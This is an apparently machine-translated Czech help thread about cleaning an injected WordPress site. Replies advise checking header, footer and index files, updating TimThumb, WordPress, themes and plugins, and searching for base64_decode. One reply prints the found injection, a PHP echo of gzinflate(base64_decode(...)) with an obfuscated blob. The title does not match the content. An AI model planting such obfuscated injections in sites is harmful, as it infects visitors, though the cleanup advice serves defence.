Penguinz0 Personální pokrytectví (bavlna Tho)

Ahoj přátelé, moje stránka wordpressu byla injektována a teď to musím vyřešit.

tady je moje doména,

http://webstutorial.com/

Co musím udělat, prosím, pomozte mi.

Nejedná se o techniku ​​spamu nebo vytváření odkazů

Zkontrolujte svůj main.php záhlaví souboru a zápatí škodlivého kódu a odstraňte jej, jedná se o infikovaný soubor. Aktualizujte soubor thumb.php z Timthumb a zkontrolujte také soubory index.php, zda neobsahují škodlivý kód.

Po odstranění škodlivého kódu z main.php a kontrole index.php vyhledejte ve všech svých souborech škodlivý kód, po vyčištění aktualizujte WordPress na nejnovější verzi, aktualizujte svou šablonu a aktualizujte všechny doplňky.

  • když jsem zkontroloval index.php soubor našel jsem tento kód # 215d25 # echo (gzinflate (base64_decode ( "TYxBDoMwDMC + UVU + Iu04AX8JJerataRLUjZ + PyQuu9qyRw2Smjk7Gk3e6GuQcceLeldwix3jqf6pSpj806w9AD60qHVjSViGwBVgpcogHF53SPVsFfK7kxw34xgLDVm9m0e4ZvMP"))); # / 215d25 #
  • Odeberte to ze souboru indexu a poté vyhledejte všechny soubory base64_decode ale odstraňte více funkcí, pouze pokud jsou úplně stejné, protože kódování base64 je normální. Tato funkce je však škodlivá.
  • Našel jsem ten kód v header.php, footer.php a v index.php souborech, které jsem odtamtud odstranil a nyní jsem hledal v jiných souborech
  • Avast již nedetekuje malware, ale chrom je, budete muset počkat, až Google znovu prolezne váš web a aktualizuje jejich index čistou verzí. Pokud to bylo užitečné, označte to jako odpověď.
  • 1 @ Nick, možná si také budeš chtít přečíst moji odpověď o zabezpečení wordpressu. Následující kroky by vás měly v budoucnu zabránit hackerům.

Pracoval pro vás: Charles Robertson | Chcete nás kontaktovat?